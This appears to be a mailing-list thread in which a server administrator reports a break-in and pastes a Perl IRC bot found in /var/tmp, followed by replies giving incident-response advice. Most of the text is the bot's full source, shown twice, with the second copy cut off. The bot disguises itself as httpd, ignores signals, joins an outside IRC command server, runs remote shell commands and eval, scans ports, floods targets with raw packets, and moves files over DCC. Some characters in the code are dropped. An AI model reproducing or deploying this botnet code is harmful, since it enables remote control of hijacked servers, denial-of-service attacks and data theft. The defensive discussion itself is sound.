My server has been seeing some usual activities today, I don't have much time
to get down to the bottom of things, but after I investigated briefly I have
decided to disable PERL executable permission for www-data (Apache process's
user), also locked /var/tmp so www-data cannot write to it.
Looks like it ignores all the `kill` signals, not sure how I can actually
kill it
I found the included script in /var/tmp called d0s.txt.
I found a bunch of processes called ./atac 20 running, and found the
following content in /tmp/atac:
here's d0s.txt:
#!/usr/bin/perl
CNFIGURACA
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
my $MDME='+pi'; # Modo Do Bot #
my $linas_max='10'; # Evita o flood :) depois de X linhas #
my $sleep='3'; # ele dorme X segundos #
IRC
my @adms=("DDS"); # Nick do administrador #
my @canais=("#bots ddos");# Canais #
my $nick='b0t'; # Nick do bot. Caso esteja em uso vai aparecer #
# # aparecer com numero radonamico no final #
my $ircname = 'b0t'; # User ID #
my $realname = '4Admin14: 4#DDS'; #
$servidor='irc.gigachat.net' unless $servidor; # Servidor de irc que vai ser usado #
# # caso seja especificado no argumento #
my $porta='6667'; # Porta do servidor de irc #
ACESS A SHELL
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
my $VERSA = '1.0';
$SIG{'INT'} = 'IGNRE';
$SIG{'HUP'} = 'IGNRE';
$SIG{'TERM'} = 'IGNRE';
$SIG{'CHLD'} = 'IGNRE';
$SIG{'PS'} = 'IGNRE';
use I::Socket;
use Socket;
use I::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new I::Select->new();
$sel_cliente = I::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = I::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PNG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSIN\001$/) {
notice("$pn", "\001Bot powered by DDS TEAM\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
print "$0 Executado \n";
sendraw("JIN $canal");
sendraw("MDE $meunick $MDME");
sendraw("PRIVMSG $canal :Modo Alterado Para4 $MDME");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = I::Socket::INET->new(PeerAddr =$hostip, PeerPort =$porta, Proto ='tcp', Timeout =4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
}
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "D inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SCK1, PF_INET, SCK_RAW, 2) or $cp++;
socket(SCK2, PF_INET, SCK_DGRAM, 17) or $cp++;
socket(SCK3, PF_INET, SCK_RAW, 1) or $cp++;
socket(SCK4, PF_INET, SCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
# DoS ? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SCK5, PF_INET, SCK_RAW, $pc) or next;
send(SCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
# ALIASES #
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTIN $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MDE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MDE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MDE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MDE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MDE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MDE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MDE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MDE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MDE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WH $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">$arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = I::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto ='tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "$arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = I::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status dai fiz ele retorna o status de acordo com o socket dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) {
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}

Looks like it ignores all the `kill` signals, not sure how I can actually
kill it

SIGKILL (Signal 9) cannot be blocked, so try:

kill -s SIGKILL <pid>
-or-
killall -KILL atac

my @canais=("#bots ddos");
my $nick='b0t';
my $ircname = 'b0t';
$servidor='irc.gigachat.net' unless $servidor;

It's an IRC bot, should be obvious, but just commenting

$SIG{'INT'} = 'IGNRE';
$SIG{'HUP'} = 'IGNRE';
$SIG{'TERM'} = 'IGNRE';
$SIG{'CHLD'} = 'IGNRE';
$SIG{'PS'} = 'IGNRE';

Again, there is no way to block SIGKILL (signal 9) for any program

# DCC
package DCC;

This is where things get really scary for you. DCC is the ability to
send files over IRC. The bot could have sent almost anything (within
certain permission ranges, we hope). Now is a very good time to
disconnect the server from the internet if you have not already done
so.

notice("$pn", "\001Bot powered by DDS TEAM\001");

This line seems to indicate that this bot is only designed to be part
of a larger "bot-net" to DoS someone, but those DCC capabilities are
worrysome. So, in addition to investigating how this got into your
server, it would also be a good idea to check what might have gotten
out.

Good luck, and apologies if you already knew all of this.

hi,
This looks like an typical irc bot written in perl and installed on
the /tmp directory, (fyi ) if the
system is not critical machine, it is advicable to take it down and do
a full forensic checking. The typical hack proceedure is:

exploit existing vulnerable application (such apache) get a
non-privilege user install bot in /tmp or any world writeable and
executable using local exploits to escalate the rights get
superuser do whatever he wants (change binary, clean logs etc)

Therefore in your case , you need to find out what's the stage of the
compromise on your system and exactly which is the entry points (the
vulnerabiliy exploited).

regards,
Rick

4/30/05, Andrew Y Ng <ayn (AT) andrewng (DOT) comwrote:
My server has been seeing some usual activities today, I don't have much time
to get down to the bottom of things, but after I investigated briefly I have
decided to disable PERL executable permission for www-data (Apache process's
user), also locked /var/tmp so www-data cannot write to it.

Looks like it ignores all the `kill` signals, not sure how I can actually
kill it

I found the included script in /var/tmp called d0s.txt.

I found a bunch of processes called ./atac 20 running, and found the
following content in /tmp/atac:

here's d0s.txt:

#!/usr/bin/perl
CNFIGURACA
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #

my $MDME='+pi'; # Modo Do Bot #

my $linas_max='10'; # Evita o flood :) depois de X linhas #

my $sleep='3'; # ele dorme X segundos #
IRC
my @adms=("DDS"); # Nick do administrador #

my @canais=("#bots ddos");# Canais #

my $nick='b0t'; # Nick do bot. Caso esteja em uso vai aparecer #
# # aparecer com numero radonamico no final #

my $ircname = 'b0t'; # User ID #

my $realname = '4Admin14: 4#DDS'; #

$servidor='irc.gigachat.net' unless $servidor; # Servidor de irc que vai ser usado #
# # caso seja especificado no argumento #

my $porta='6667'; # Porta do servidor de irc #
ACESS A SHELL
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #

my $VERSA = '1.0';

$SIG{'INT'} = 'IGNRE';
$SIG{'HUP'} = 'IGNRE';
$SIG{'TERM'} = 'IGNRE';
$SIG{'CHLD'} = 'IGNRE';
$SIG{'PS'} = 'IGNRE';

use I::Socket;
use Socket;
use I::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new I::Select->new();

$sel_cliente = I::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];

my $IRC_socket = I::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;

$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);

$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}

}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);

for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}

sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PNG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSIN\001$/) {
notice("$pn", "\001Bot powered by DDS TEAM\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
print "$0 Executado \n";
sendraw("JIN $canal");
sendraw("MDE $meunick $MDME");
sendraw("PRIVMSG $canal :Modo Alterado Para4 $MDME");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = I::Socket::INET->new(PeerAddr =$hostip, PeerPort =$porta, Proto ='tcp', Timeout =4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}

if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
}
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};

sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");

}
exit;
}
}
}

sub ircase {
my ($kem, $printl, $case) = @_;

if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "D inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

#eu fiz um pacotadorzinhu e talz dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SCK1, PF_INET, SCK_RAW, 2) or $cp++;
socket(SCK2, PF_INET, SCK_DGRAM, 17) or $cp++;
socket(SCK3, PF_INET, SCK_RAW, 1) or $cp++;
socket(SCK4, PF_INET, SCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
